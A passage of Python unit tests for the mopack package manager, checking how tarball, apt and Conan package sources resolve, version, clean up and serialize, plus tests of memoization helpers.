self.assertEqual(oldpkg.clean_pre(None, self.pkgdir, True), True)
mlog.assert_not_called()
mrmtree.assert_called_once_with(srcdir, ignore_errors=True)
def test_clean_post(self):
otherpath = os.path.join(test_data_dir, 'other_project.tar.gz')
oldpkg = self.make_package('foo', path=self.srcpath,
srcdir='bfg_project', build='bfg9000')
newpkg1 = self.make_package('foo', path=otherpath, build='bfg9000')
newpkg2 = self.make_package(AptPackage, 'foo')
# Tarball -> Tarball (same)
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch(mock_bfgclean) as mclean: # noqa
self.assertEqual(oldpkg.clean_post(oldpkg, self.pkgdir), False)
mlog.assert_not_called()
mclean.assert_not_called()
# Tarball -> Tarball (different)
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch(mock_bfgclean) as mclean: # noqa
self.assertEqual(oldpkg.clean_post(newpkg1, self.pkgdir), True)
mlog.assert_called_once()
mclean.assert_called_once_with(self.pkgdir)
# Tarball -> Apt
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch(mock_bfgclean) as mclean: # noqa
self.assertEqual(oldpkg.clean_post(newpkg2, self.pkgdir), True)
mlog.assert_called_once()
mclean.assert_called_once_with(self.pkgdir)
# Tarball -> nothing
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch(mock_bfgclean) as mclean: # noqa
self.assertEqual(oldpkg.clean_post(None, self.pkgdir), True)
mlog.assert_called_once()
mclean.assert_called_once_with(self.pkgdir)
# Tarball -> nothing (quiet)
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch(mock_bfgclean) as mclean: # noqa
self.assertEqual(oldpkg.clean_post(None, self.pkgdir, True), True)
mlog.assert_not_called()
mclean.assert_called_once_with(self.pkgdir)
def test_clean_all(self):
otherpath = os.path.join(test_data_dir, 'other_project.tar.gz')
oldpkg = self.make_package('foo', path=self.srcpath,
srcdir='bfg_project', build='bfg9000')
newpkg1 = self.make_package('foo', path=otherpath, build='bfg9000')
newpkg2 = self.make_package(AptPackage, 'foo')
srcdir = os.path.join(self.pkgdir, 'src', 'foo')
# Tarball -> Tarball (same)
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch(mock_bfgclean) as mclean, \
mock.patch('shutil.rmtree') as mrmtree: # noqa
self.assertEqual(oldpkg.clean_all(oldpkg, self.pkgdir),
(False, False))
mlog.assert_not_called()
mclean.assert_not_called()
mrmtree.assert_not_called()
# Tarball -> Tarball (different)
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch(mock_bfgclean) as mclean, \
mock.patch('shutil.rmtree') as mrmtree: # noqa
self.assertEqual(oldpkg.clean_all(newpkg1, self.pkgdir),
(True, True))
self.assertEqual(mlog.call_count, 2)
mclean.assert_called_once_with(self.pkgdir)
mrmtree.assert_called_once_with(srcdir, ignore_errors=True)
# Tarball -> Apt
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch(mock_bfgclean) as mclean, \
mock.patch('shutil.rmtree') as mrmtree: # noqa
self.assertEqual(oldpkg.clean_all(newpkg2, self.pkgdir),
(True, True))
self.assertEqual(mlog.call_count, 2)
mclean.assert_called_once_with(self.pkgdir)
mrmtree.assert_called_once_with(srcdir, ignore_errors=True)
# Tarball -> nothing
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch(mock_bfgclean) as mclean, \
mock.patch('shutil.rmtree') as mrmtree: # noqa
self.assertEqual(oldpkg.clean_all(None, self.pkgdir),
(True, True))
self.assertEqual(mlog.call_count, 2)
mclean.assert_called_once_with(self.pkgdir)
mrmtree.assert_called_once_with(srcdir, ignore_errors=True)
# Tarball -> nothing (quiet)
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch(mock_bfgclean) as mclean, \
mock.patch('shutil.rmtree') as mrmtree: # noqa
self.assertEqual(oldpkg.clean_all(None, self.pkgdir, True),
(True, True))
mlog.assert_not_called()
mclean.assert_called_once_with(self.pkgdir)
mrmtree.assert_called_once_with(srcdir, ignore_errors=True)
def test_equality(self):
otherpath = os.path.join(test_data_dir, 'other_project.tar.gz')
pkg = self.make_package('foo', path=self.srcpath, build='bfg9000')
self.assertEqual(pkg, self.make_package(
'foo', path=self.srcpath, build='bfg9000'
))
self.assertEqual(pkg, self.make_package(
'foo', path=self.srcpath, build='bfg9000',
config_file='/path/to/mopack2.yml'
))
self.assertNotEqual(pkg, self.make_package(
'bar', path=self.srcpath, build='bfg9000'
))
self.assertNotEqual(pkg, self.make_package(
'foo', url=self.srcurl, build='bfg9000'
))
self.assertNotEqual(pkg, self.make_package(
'foo', path=otherpath, build='bfg9000'
))
def test_rehydrate(self):
opts = self.make_options()
pkg = TarballPackage('foo', path=self.srcpath, build='bfg9000',
_options=opts, config_file=self.config_file)
data = through_json(pkg.dehydrate())
self.assertEqual(pkg, Package.rehydrate(data, _options=opts))
pkg = TarballPackage('foo', url=self.srcurl, build='bfg9000',
_options=opts, config_file=self.config_file)
data = through_json(pkg.dehydrate())
self.assertEqual(pkg, Package.rehydrate(data, _options=opts))
pkg = TarballPackage('foo', path=self.srcpath, _options=opts,
config_file=self.config_file)
with self.assertRaises(ConfigurationError):
data = pkg.dehydrate()
def test_upgrade(self):
opts = self.make_options()
data = {'source': 'tarball', '_version': 0, 'name': 'foo',
'path': {'base': 'cfgdir', 'path': 'foo.tar.gz'}, 'url': None,
'files': [], 'srcdir': '.',
'patch': None, 'build': {'type': 'none', '_version': 0},
'usage': {'type': 'system', '_version': 0}}
with mock.patch.object(TarballPackage, 'upgrade',
side_effect=TarballPackage.upgrade) as m:
pkg = Package.rehydrate(data, _options=opts)
self.assertIsInstance(pkg, TarballPackage)
m.assert_called_once()
def test_builder_types(self):
pkg = TarballPackage('foo', path=self.srcpath, build='bfg9000',
_options=self.make_options(),
config_file=self.config_file)
self.assertEqual(pkg.builder_types, ['bfg9000'])
pkg = TarballPackage('foo', path=self.srcpath,
_options=self.make_options(),
config_file=self.config_file)
with self.assertRaises(ConfigurationError):
pkg.builder_types
```
#### File: unit/sources/test_apt.py
```python
import os
import subprocess
from unittest import mock
from . import SourceTest, through_json
from .. import mock_open_log
from mopack.iterutils import iterate
from mopack.sources import Package
from mopack.sources.apt import AptPackage
from mopack.sources.conan import ConanPackage
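# Test helper: simulates subprocess.run so that 'dpkg-query' succeeds and
# reports version 1.2.3, while any other command (e.g. pkg-config) raises
# OSError as if the executable were unavailable.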
def mock_run(args, **kwargs):
if args[0] == 'dpkg-query':
return subprocess.CompletedProcess(args, 0, '1.2.3')
raise OSError()
class TestApt(SourceTest):
pkg_type = AptPackage
config_file = '/path/to/mopack.yml'
pkgdir = '/path/to/builddir/mopack'
pkgconfdir = os.path.join(pkgdir, 'pkgconfig')
def check_resolve_all(self, packages, remotes):
with mock_open_log() as mopen, \
mock.patch('subprocess.run') as mrun: # noqa
AptPackage.resolve_all(packages, self.pkgdir)
mopen.assert_called_with(os.path.join(
self.pkgdir, 'logs', 'apt.log'
), 'a')
for i in packages:
if i.repository:
mrun.assert_any_call(
['sudo', 'add-apt-repository', '-y', i.repository],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
universal_newlines=True, check=True
)
mrun.assert_any_call(
['sudo', 'apt-get', 'update'], stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, universal_newlines=True, check=True
)
mrun.assert_any_call(
['sudo', 'apt-get', 'install', '-y'] + remotes,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
universal_newlines=True, check=True
)
def check_usage(self, pkg, *, submodules=None, usage=None):
if usage is None:
pcname = ('{}[{}]'.format(pkg.name, ','.join(submodules))
if submodules else pkg.name)
libs = ([] if pkg.submodules and pkg.submodules['required']
else [pkg.name])
libs.extend('{}_{}'.format(pkg.name, i)
for i in iterate(submodules))
usage = {'name': pkg.name, 'type': 'system',
'path': [self.pkgconfdir], 'pcfiles': [pcname],
'generated': True, 'auto_link': False}
with mock.patch('subprocess.run', mock_run), \
mock.patch('mopack.usage.path_system.PathUsage._filter_path',
lambda *args: []), \
mock.patch('mopack.usage.path_system.file_outdated',
return_value=True), \
mock.patch('os.makedirs'), \
mock.patch('builtins.open'): # noqa
self.assertEqual(pkg.get_usage(submodules, self.pkgdir), usage)
def test_basic(self):
pkg = self.make_package('foo')
self.assertEqual(pkg.remote, ['libfoo-dev'])
self.assertEqual(pkg.repository, None)
self.assertEqual(pkg.needs_dependencies, False)
self.assertEqual(pkg.should_deploy, True)
self.check_resolve_all([pkg], ['libfoo-dev'])
with mock.patch('subprocess.run', side_effect=mock_run) as mrun:
self.assertEqual(pkg.version(self.pkgdir), '1.2.3')
mrun.assert_has_calls([
mock.call(
['pkg-config', 'foo', '--modversion'], check=True,
stdout=subprocess.PIPE, stderr=subprocess.DEVNULL,
universal_newlines=True
),
mock.call(
['dpkg-query', '-W', '-f${Version}', 'libfoo-dev'],
check=True, stdout=subprocess.PIPE, universal_newlines=True
),
])
self.check_usage(pkg)
def test_remote(self):
pkg = self.make_package('foo', remote='foo-dev')
self.assertEqual(pkg.remote, ['foo-dev'])
self.assertEqual(pkg.repository, None)
self.check_resolve_all([pkg], ['foo-dev'])
with mock.patch('subprocess.run', side_effect=mock_run) as mrun:
self.assertEqual(pkg.version(self.pkgdir), '1.2.3')
mrun.assert_has_calls([
mock.call(
['pkg-config', 'foo', '--modversion'], check=True,
stdout=subprocess.PIPE, stderr=subprocess.DEVNULL,
universal_newlines=True
),
mock.call(
['dpkg-query', '-W', '-f${Version}', 'foo-dev'],
check=True, stdout=subprocess.PIPE, universal_newlines=True
),
])
self.check_usage(pkg)
pkg = self.make_package('foo', remote=['foo-dev', 'bar-dev'])
self.assertEqual(pkg.remote, ['foo-dev', 'bar-dev'])
self.assertEqual(pkg.repository, None)
self.check_resolve_all([pkg], ['foo-dev', 'bar-dev'])
with mock.patch('subprocess.run', side_effect=mock_run) as mrun:
pkg.version(self.pkgdir)
mrun.assert_has_calls([
mock.call(
['pkg-config', 'foo', '--modversion'], check=True,
stdout=subprocess.PIPE, stderr=subprocess.DEVNULL,
universal_newlines=True
),
mock.call(
['dpkg-query', '-W', '-f${Version}', 'foo-dev'],
check=True, stdout=subprocess.PIPE, universal_newlines=True
),
])
self.check_usage(pkg)
def test_repository(self):
pkg = self.make_package('foo', remote='foo-dev',
repository='ppa:foo/stable')
self.assertEqual(pkg.remote, ['foo-dev'])
self.assertEqual(pkg.repository, 'ppa:foo/stable')
self.check_resolve_all([pkg], ['foo-dev'])
self.check_usage(pkg)
def test_explicit_version(self):
pkg = self.make_package('foo', usage={
'type': 'system', 'version': '2.0',
})
self.assertEqual(pkg.remote, ['libfoo-dev'])
self.assertEqual(pkg.repository, None)
self.assertEqual(pkg.needs_dependencies, False)
self.assertEqual(pkg.should_deploy, True)
self.check_resolve_all([pkg], ['libfoo-dev'])
with mock.patch('subprocess.run', side_effect=mock_run) as mrun:
self.assertEqual(pkg.version(self.pkgdir), '2.0')
mrun.assert_called_once_with(
['pkg-config', 'foo', '--modversion'], check=True,
stdout=subprocess.PIPE, stderr=subprocess.DEVNULL,
universal_newlines=True
)
self.check_usage(pkg)
def test_multiple(self):
pkgs = [self.make_package('foo'),
self.make_package('bar', remote='bar-dev')]
self.check_resolve_all(pkgs, ['libfoo-dev', 'bar-dev'])
for pkg in pkgs:
self.check_usage(pkg)
def test_submodules(self):
submodules_required = {'names': '*', 'required': True}
submodules_optional = {'names': '*', 'required': False}
pkg = self.make_package('foo', submodules=submodules_required)
self.check_resolve_all([pkg], ['libfoo-dev'])
self.check_usage(pkg, submodules=['sub'])
pkg = self.make_package(
'foo', usage={'type': 'system', 'libraries': 'bar'},
submodules=submodules_required
)
self.check_resolve_all([pkg], ['libfoo-dev'])
self.check_usage(pkg, submodules=['sub'], usage={
'name': 'foo', 'type': 'system', 'path': [self.pkgconfdir],
'pcfiles': ['foo[sub]'], 'generated': True, 'auto_link': False,
})
pkg = self.make_package('foo', submodules=submodules_optional)
self.check_resolve_all([pkg], ['libfoo-dev'])
self.check_usage(pkg, submodules=['sub'])
pkg = self.make_package(
'foo', usage={'type': 'system', 'libraries': 'bar'},
submodules=submodules_optional
)
self.check_resolve_all([pkg], ['libfoo-dev'])
self.check_usage(pkg, submodules=['sub'], usage={
'name': 'foo', 'type': 'system', 'path': [self.pkgconfdir],
'pcfiles': ['foo[sub]'], 'generated': True, 'auto_link': False,
})
def test_invalid_submodule(self):
pkg = self.make_package('foo', submodules={
'names': ['sub'], 'required': True
})
with self.assertRaises(ValueError):
pkg.get_usage(['invalid'], self.pkgdir)
def test_deploy(self):
pkg = self.make_package('foo')
# This is a no-op; just make sure it executes ok.
AptPackage.deploy_all([pkg], self.pkgdir)
def test_clean_pre(self):
oldpkg = self.make_package('foo')
newpkg = self.make_package(ConanPackage, 'foo',
remote='foo/1.2.4@conan/stable')
# Apt -> Conan
self.assertEqual(oldpkg.clean_pre(newpkg, self.pkgdir), False)
# Apt -> nothing
self.assertEqual(oldpkg.clean_pre(None, self.pkgdir), False)
def test_clean_post(self):
oldpkg = self.make_package('foo')
newpkg = self.make_package(ConanPackage, 'foo',
remote='foo/1.2.4@conan/stable')
# Apt -> Conan
self.assertEqual(oldpkg.clean_post(newpkg, self.pkgdir), False)
# Apt -> nothing
self.assertEqual(oldpkg.clean_post(None, self.pkgdir), False)
def test_clean_all(self):
oldpkg = self.make_package('foo')
newpkg = self.make_package(ConanPackage, 'foo',
remote='foo/1.2.4@conan/stable')
# Apt -> Conan
self.assertEqual(oldpkg.clean_all(newpkg, self.pkgdir), (False, False))
# Apt -> nothing
self.assertEqual(oldpkg.clean_all(None, self.pkgdir), (False, False))
def test_equality(self):
pkg = self.make_package('foo')
self.assertEqual(pkg, self.make_package('foo'))
self.assertEqual(pkg, self.make_package('foo', remote='libfoo-dev'))
self.assertEqual(pkg, self.make_package(
'foo', config_file='/path/to/mopack2.yml'
))
self.assertNotEqual(pkg, self.make_package('bar'))
self.assertNotEqual(pkg, self.make_package('bar', remote='libfoo-dev'))
self.assertNotEqual(pkg, self.make_package('foo', remote='libbar-dev'))
def test_rehydrate(self):
opts = self.make_options()
pkg = AptPackage('foo', remote='libbar-dev', _options=opts,
config_file=self.config_file)
data = through_json(pkg.dehydrate())
self.assertEqual(pkg, Package.rehydrate(data, _options=opts))
def test_upgrade(self):
opts = self.make_options()
data = {'source': 'apt', '_version': 0, 'name': 'foo',
'remote': 'libfoo-dev', 'repository': None,
'usage': {'type': 'system', '_version': 0}}
with mock.patch.object(AptPackage, 'upgrade',
side_effect=AptPackage.upgrade) as m:
pkg = Package.rehydrate(data, _options=opts)
self.assertIsInstance(pkg, AptPackage)
m.assert_called_once()
```
#### File: unit/sources/test_conan.py
```python
import os
import subprocess
from io import StringIO
from textwrap import dedent
from unittest import mock
from . import OptionsTest, SourceTest, through_json
from .. import mock_open_log
from mopack.iterutils import iterate
from mopack.shell import ShellArguments
from mopack.sources import Package, PackageOptions
from mopack.sources.apt import AptPackage
from mopack.sources.conan import ConanPackage
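# Test helper: builds a mock for builtins.open whose first call returns an
# in-memory file object (with a no-op close), so the tests below can read
# back the conanfile text that resolve_all() writes.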
def mock_open_write():
class MockFile(StringIO):
def close(self):
pass
mock_open = mock.mock_open()
def non_mock(*args, **kwargs):
mock_open.side_effect = None
mock_open.mock_file = MockFile()
return mock_open.mock_file
mock_open.side_effect = non_mock
return mock_open
class TestConan(SourceTest):
pkg_type = ConanPackage
config_file = os.path.abspath('/path/to/mopack.yml')
pkgdir = os.path.abspath('/path/to/builddir/mopack')
pkgconfdir = os.path.join(pkgdir, 'conan')
def check_resolve_all(self, pkgs, conanfile, extra_args=[]):
with mock_open_log(mock_open_write()) as mopen, \
mock.patch('subprocess.run') as mrun: # noqa
ConanPackage.resolve_all(pkgs, self.pkgdir)
self.assertEqual(mopen.mock_file.getvalue(), conanfile)
conandir = os.path.join(self.pkgdir, 'conan')
mrun.assert_called_with(
(['conan', 'install', '-if', conandir] + extra_args +
['--', self.pkgdir]),
stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
universal_newlines=True, check=True
)
def check_usage(self, pkg, *, submodules=None, usage=None):
if usage is None:
pcfiles = ([] if pkg.submodules and pkg.submodules['required'] else
[pkg.name])
pcfiles.extend('{}_{}'.format(pkg.name, i)
for i in iterate(submodules))
usage = {'name': pkg.name, 'type': 'pkg_config',
'path': [self.pkgconfdir], 'pcfiles': pcfiles,
'extra_args': []}
self.assertEqual(pkg.get_usage(submodules, self.pkgdir), usage)
def test_basic(self):
pkg = self.make_package('foo', remote='foo/1.2.3@conan/stable')
self.assertEqual(pkg.remote, 'foo/1.2.3@conan/stable')
self.assertEqual(pkg.build, False)
self.assertEqual(pkg.options, {})
self.assertEqual(pkg.needs_dependencies, False)
self.assertEqual(pkg.should_deploy, True)
self.check_resolve_all([pkg], dedent("""\
[requires]
foo/1.2.3@conan/stable
[options]
[generators]
pkg_config
"""))
with mock.patch('subprocess.run') as mrun:
pkg.version(self.pkgdir)
mrun.assert_called_once_with(
['conan', 'inspect', '--raw=version',
'foo/1.2.3@conan/stable'],
check=True, stdout=subprocess.PIPE, universal_newlines=True
)
self.check_usage(pkg)
def test_build(self):
pkg = self.make_package('foo', remote='foo/1.2.3@conan/stable',
build=True)
self.assertEqual(pkg.remote, 'foo/1.2.3@conan/stable')
self.assertEqual(pkg.build, True)
self.assertEqual(pkg.options, {})
self.assertEqual(pkg.needs_dependencies, False)
self.assertEqual(pkg.should_deploy, True)
self.check_resolve_all([pkg], dedent("""\
[requires]
foo/1.2.3@conan/stable
[options]
[generators]
pkg_config
"""), ['--build=foo'])
self.check_usage(pkg)
def test_options(self):
pkg = self.make_package('foo', remote='foo/1.2.3@conan/stable',
options={'shared': True})
self.assertEqual(pkg.remote, 'foo/1.2.3@conan/stable')
self.assertEqual(pkg.build, False)
self.assertEqual(pkg.options, {'shared': True})
self.assertEqual(pkg.should_deploy, True)
self.check_resolve_all([pkg], dedent("""\
[requires]
foo/1.2.3@conan/stable
[options]
foo:shared=True
[generators]
pkg_config
"""))
self.check_usage(pkg)
def test_this_options(self):
pkg = self.make_package('foo', remote='foo/1.2.3@conan/stable',
this_options={'build': 'foo',
'extra_args': '-gcmake'})
self.assertEqual(pkg.remote, 'foo/1.2.3@conan/stable')
self.assertEqual(pkg.build, False)
self.assertEqual(pkg.options, {})
self.assertEqual(pkg.should_deploy, True)
self.check_resolve_all([pkg], dedent("""\
[requires]
foo/1.2.3@conan/stable
[options]
[generators]
pkg_config
"""), ['--build=foo', '-gcmake'])
self.check_usage(pkg)
def test_this_options_build_all(self):
pkg = self.make_package('foo', remote='foo/1.2.3@conan/stable',
this_options={'build': 'all'})
self.assertEqual(pkg.remote, 'foo/1.2.3@conan/stable')
self.assertEqual(pkg.build, False)
self.assertEqual(pkg.options, {})
self.assertEqual(pkg.should_deploy, True)
self.check_resolve_all([pkg], dedent("""\
[requires]
foo/1.2.3@conan/stable
[options]
[generators]
pkg_config
"""), ['--build'])
self.check_usage(pkg)
def test_this_options_merge_build(self):
pkg = self.make_package(
'foo', remote='foo/1.2.3@conan/stable', build=True,
this_options={'build': ['foo', 'bar']}
)
self.assertEqual(pkg.remote, 'foo/1.2.3@conan/stable')
self.assertEqual(pkg.build, True)
self.assertEqual(pkg.options, {})
self.assertEqual(pkg.should_deploy, True)
self.check_resolve_all([pkg], dedent("""\
[requires]
foo/1.2.3@conan/stable
[options]
[generators]
pkg_config
"""), ['--build=foo', '--build=bar'])
self.check_usage(pkg)
def test_multiple(self):
pkgs = [
self.make_package('foo', remote='foo/1.2.3@conan/stable'),
self.make_package('bar', remote='bar/2.3.4@conan/stable',
options={'shared': True}),
]
self.check_resolve_all(pkgs, dedent("""\
[requires]
foo/1.2.3@conan/stable
bar/2.3.4@conan/stable
[options]
bar:shared=True
[generators]
pkg_config
"""))
for pkg in pkgs:
self.check_usage(pkg)
def test_submodules(self):
submodules_required = {'names': '*', 'required': True}
submodules_optional = {'names': '*', 'required': False}
pkg = self.make_package('foo', remote='foo/1.2.3@conan/stable',
submodules=submodules_required)
self.check_usage(pkg, submodules=['sub'])
pkg = self.make_package('foo', remote='foo/1.2.3@conan/stable',
usage={'type': 'pkg_config', 'path': '.',
'pcfile': 'bar'},
submodules=submodules_required)
self.check_usage(pkg, submodules=['sub'], usage={
'name': 'foo', 'type': 'pkg_config', 'path': [self.pkgconfdir],
'pcfiles': ['bar', 'foo_sub'], 'extra_args': [],
})
pkg = self.make_package('foo', remote='foo/1.2.3@conan/stable',
submodules=submodules_optional)
self.check_usage(pkg, submodules=['sub'])
pkg = self.make_package('foo', remote='foo/1.2.3@conan/stable',
usage={'type': 'pkg_config', 'path': '.',
'pcfile': 'bar'},
submodules=submodules_optional)
self.check_usage(pkg, submodules=['sub'], usage={
'name': 'foo', 'type': 'pkg_config', 'path': [self.pkgconfdir],
'pcfiles': ['bar', 'foo_sub'], 'extra_args': [],
})
def test_invalid_submodule(self):
pkg = self.make_package(
'foo', remote='foo/1.2.3@conan/stable',
submodules={'names': ['sub'], 'required': True}
)
with self.assertRaises(ValueError):
pkg.get_usage(['invalid'], self.pkgdir)
def test_deploy(self):
pkg = self.make_package('foo', remote='foo/1.2.3@conan/stable')
self.assertEqual(pkg.should_deploy, True)
with mock.patch('warnings.warn') as mwarn:
ConanPackage.deploy_all([pkg], self.pkgdir)
mwarn.assert_called_once()
pkg = self.make_package('foo', remote='foo/1.2.3@conan/stable',
deploy=False)
self.assertEqual(pkg.should_deploy, False)
with mock.patch('warnings.warn') as mwarn:
ConanPackage.deploy_all([pkg], self.pkgdir)
mwarn.assert_not_called()
def test_clean_pre(self):
oldpkg = self.make_package('foo', remote='foo/1.2.3@conan/stable')
newpkg = self.make_package(AptPackage, 'foo')
# Conan -> Apt
self.assertEqual(oldpkg.clean_pre(newpkg, self.pkgdir), False)
# Conan -> Nothing
self.assertEqual(oldpkg.clean_pre(None, self.pkgdir), False)
def test_clean_post(self):
oldpkg = self.make_package('foo', remote='foo/1.2.3@conan/stable')
newpkg1 = self.make_package('foo', remote='foo/1.2.4@conan/stable')
newpkg2 = self.make_package(AptPackage, 'foo')
# Conan -> Conan
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch('os.remove') as mremove: # noqa
self.assertEqual(oldpkg.clean_post(newpkg1, self.pkgdir), False)
mlog.assert_not_called()
mremove.assert_not_called()
# Conan -> Apt
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch('os.remove') as mremove: # noqa
self.assertEqual(oldpkg.clean_post(newpkg2, self.pkgdir), True)
mlog.assert_called_once()
mremove.assert_called_once_with(os.path.join(
self.pkgdir, 'conan', 'foo.pc'
))
# Conan -> nothing
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch('os.remove') as mremove: # noqa
self.assertEqual(oldpkg.clean_post(None, self.pkgdir), True)
mlog.assert_called_once()
mremove.assert_called_once_with(os.path.join(
self.pkgdir, 'conan', 'foo.pc'
))
# Conan -> nothing (quiet)
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch('os.remove') as mremove: # noqa
self.assertEqual(oldpkg.clean_post(None, self.pkgdir, True), True)
mlog.assert_not_called()
mremove.assert_called_once_with(os.path.join(
self.pkgdir, 'conan', 'foo.pc'
))
# Error deleting
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch('os.remove',
side_effect=FileNotFoundError) as mremove: # noqa
self.assertEqual(oldpkg.clean_post(None, self.pkgdir), True)
mlog.assert_called_once()
mremove.assert_called_once_with(os.path.join(
self.pkgdir, 'conan', 'foo.pc'
))
def test_clean_all(self):
oldpkg = self.make_package('foo', remote='foo/1.2.3@conan/stable')
newpkg1 = self.make_package('foo', remote='foo/1.2.4@conan/stable')
newpkg2 = self.make_package(AptPackage, 'foo')
# Conan -> Conan
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch('os.remove') as mremove: # noqa
self.assertEqual(oldpkg.clean_all(newpkg1, self.pkgdir),
(False, False))
mlog.assert_not_called()
mremove.assert_not_called()
# Conan -> Apt
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch('os.remove') as mremove: # noqa
self.assertEqual(oldpkg.clean_all(newpkg2, self.pkgdir),
(False, True))
mlog.assert_called_once()
mremove.assert_called_once_with(os.path.join(
self.pkgdir, 'conan', 'foo.pc'
))
# Conan -> nothing
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch('os.remove') as mremove: # noqa
self.assertEqual(oldpkg.clean_all(None, self.pkgdir),
(False, True))
mlog.assert_called_once()
mremove.assert_called_once_with(os.path.join(
self.pkgdir, 'conan', 'foo.pc'
))
# Error deleting
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch('os.remove',
side_effect=FileNotFoundError) as mremove: # noqa
self.assertEqual(oldpkg.clean_all(None, self.pkgdir),
(False, True))
mlog.assert_called_once()
mremove.assert_called_once_with(os.path.join(
self.pkgdir, 'conan', 'foo.pc'
))
def test_equality(self):
remote = 'foo/1.2.3@conan/stable'
options = {'shared': True}
pkg = self.make_package('foo', remote=remote, options=options)
self.assertEqual(pkg, self.make_package(
'foo', remote=remote, options=options
))
self.assertEqual(pkg, self.make_package(
'foo', remote=remote, options=options,
config_file='/path/to/mopack2.yml'
))
self.assertNotEqual(pkg, self.make_package(
'bar', remote=remote, options=options
))
self.assertNotEqual(pkg, self.make_package(
'foo', remote='foo/1.2.4@conan/stable', options=options
))
self.assertNotEqual(pkg, self.make_package('foo', remote=remote))
def test_rehydrate(self):
opts = self.make_options()
pkg = ConanPackage('foo', remote='foo/1.2.3@conan/stable',
options={'shared': True}, _options=opts,
config_file=self.config_file)
data = through_json(pkg.dehydrate())
self.assertEqual(pkg, Package.rehydrate(data, _options=opts))
def test_upgrade(self):
opts = self.make_options()
data = {'source': 'conan', '_version': 0, 'name': 'foo',
'remote': 'foo', 'build': False, 'options': None,
'usage': {'type': 'system', '_version': 0}}
with mock.patch.object(ConanPackage, 'upgrade',
side_effect=ConanPackage.upgrade) as m:
pkg = Package.rehydrate(data, _options=opts)
self.assertIsInstance(pkg, ConanPackage)
m.assert_called_once()
class TestConanOptions(OptionsTest):
symbols = {'variable': 'value'}
def test_default(self):
opts = ConanPackage.Options()
self.assertEqual(opts.build, [])
self.assertEqual(opts.extra_args, ShellArguments())
def test_build(self):
opts = ConanPackage.Options()
opts(build='foo', config_file=self.config_file, _symbols=self.symbols)
self.assertEqual(opts.build, ['foo'])
opts(build=['bar', 'foo', 'baz'], config_file=self.config_file,
_symbols=self.symbols)
self.assertEqual(opts.build, ['foo', 'bar', 'baz'])
opts(build='$variable', config_file=self.config_file,
_symbols=self.symbols)
self.assertEqual(opts.build, ['foo', 'bar', 'baz', 'value'])
def test_extra_args(self):
opts = ConanPackage.Options()
opts(extra_args='--foo', config_file=self.config_file,
_symbols=self.symbols)
self.assertEqual(opts.extra_args, ShellArguments(['--foo']))
opts(extra_args='--bar --baz', config_file=self.config_file,
_symbols=self.symbols)
self.assertEqual(opts.extra_args, ShellArguments([
'--foo', '--bar', '--baz'
]))
opts(extra_args=['--goat', '--panda'], config_file=self.config_file,
_symbols=self.symbols)
self.assertEqual(opts.extra_args, ShellArguments([
'--foo', '--bar', '--baz', '--goat', '--panda'
]))
opts(extra_args='$variable', config_file=self.config_file,
_symbols=self.symbols)
self.assertEqual(opts.extra_args, ShellArguments([
'--foo', '--bar', '--baz', '--goat', '--panda', 'value'
]))
def test_rehydrate(self):
opts = ConanPackage.Options()
opts(build='foo', extra_args='--arg', config_file=self.config_file,
_symbols=self.symbols)
data = through_json(opts.dehydrate())
self.assertEqual(opts, PackageOptions.rehydrate(data))
def test_upgrade(self):
data = {'source': 'conan', '_version': 0, 'build': [],
'extra_args': []}
with mock.patch.object(ConanPackage.Options, 'upgrade',
side_effect=ConanPackage.Options.upgrade) as m:
pkg = PackageOptions.rehydrate(data)
self.assertIsInstance(pkg, ConanPackage.Options)
m.assert_called_once()
```
#### File: test/unit/test_objutils.py
```python
from unittest import TestCase
from mopack.objutils import *
class TestMemoize(TestCase):
def test_memoize_0_args(self):
i = 0
@memoize
def f():
nonlocal i
i += 1
return i
self.assertEqual(f(), 1)
self.assertEqual(f(), 1)
def test_memoize_1_arg(self):
i = 0
@memoize
def f(j):
nonlocal i
i += 1
return i + j
self.assertEqual(f(0), 1)
self.assertEqual(f(1), 3)
self.assertEqual(f(0), 1)
def test_memoize_reset(self):
i = 0
@memoize
def f(j):
nonlocal i
i += 1
return i + j
self.assertEqual(f(0), 1)
self.assertEqual(f(1), 3)
f._reset()
self.assertEqual(f(0), 3)
self.assertEqual(f(1), 5)
class TestMemoizeMethod(TestCase):
def test_memoize_0_args(self):
class Foo:
def __init__(self, i):
self.i = i
@memoize_method
def fn(self):
self.i += 1
return self.i
f = Foo(0)
self.assertEqual(f.fn(), 1)
self.assertEqual(f.fn(), 1)
g = Foo(1)
self.assertEqual(g.fn(), 2)
self.assertEqual(g.fn(), 2)
del g
h = Foo(2)
self.assertEqual(h.fn(), 3)
self.assertEqual(h.fn(), 3)
def test_memoize_1_arg(self):
class Foo:
def __init__(self, i):
self.i = i
@memoize_method
def fn(self, j):
self.i += 1
return self.i + j
f = Foo(0)
self.assertEqual(f.fn(0), 1)
self.assertEqual(f.fn(1), 3)
self.assertEqual(f.fn(0), 1)
g = Foo(1)
self.assertEqual(g.fn(0), 2)
self.assertEqual(g.fn(1), 4)
self.assertEqual(g.fn(0), 2)
del g
h = Foo(2)
self.assertEqual(h.fn(0), 3)
self.assertEqual(h.fn(1), 5)
self.assertEqual(h.fn(0), 3)
def test_memoize_reset(self):
class Foo:
def __init__(self, i):
self.i = i
@memoize_method
def fn(self, j):
self.i += 1
return self.i + j
f = Foo(0)
